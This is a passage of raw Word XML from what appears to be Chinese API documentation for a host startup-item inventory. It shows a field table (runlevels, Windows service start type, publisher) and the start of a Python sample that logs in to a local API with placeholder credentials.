          <w:p w14:paraId="51843B24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58DDC18C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69AB5050" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AADF8BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F2C4E50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C54361" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67B6C4DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BEB8A71" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C34FAD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47879B30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38596A2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594A8C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动项名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="379BB201" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="362AE1F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>defaultOpen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="262BEDE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E5214E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF8A9ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>默认模式启用状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2ED7063B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B08A016" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F25006" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EF4BC8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF1C31D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>停机(rc0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03CB28E3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A16BEFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25A969D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4E41F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28454094" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>单用户模式(rc1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BB5EBDC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EC4C02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2C9D67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="399F467E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E6033F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>多用户无NFS模式(rc2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68C73DE4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D26370E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E1AEFA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A688BCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C7D872" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>完全多用户模式(rc3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="607803D3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9E41AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="584A4843" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C317F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7A5E14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>预留模式(rc4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5C4F6C1B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77379854" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADBD730" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EDB0BE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="446470FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>桌面模式(rc5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DF2DF31" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF32B9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24DCFDC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D0089BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28B11EAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>重新启动(rc6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AB33AE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59691671" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rc7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8EDD5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16CF43B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28652117" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>单用户自启动(rcs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1CC7852A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E6CD89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2967EE04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Interger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1322E2DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C657F0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>默认启动模式(仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23075E2D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D4C70A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>xinetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68899831" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01A0897D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C7334A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="604CE043" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB49D7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680A518F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EE7C352" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C3D21F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务启动用户windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16C54A3B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00445AE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595F6332" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6D5FDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E037C52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务的状态windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7461BF94" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29BD7767" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649A6635" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="124FFD83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21BD408A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动类型windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68D64D68" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64FF7B9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383610C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D2E5480" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="456C5A70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发布者windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30D26D0B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00647D01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>showName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A1C4A42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A5996FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A01C43E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动项名（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13AE15D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windows启动项代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1888A097" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>from __future__ import absolute_import</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/v1/api/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    json_body = json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method="POST", url=url, body=json_body, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = conn.getresponse()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = response.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return json.loads(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def send_request(method, url, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
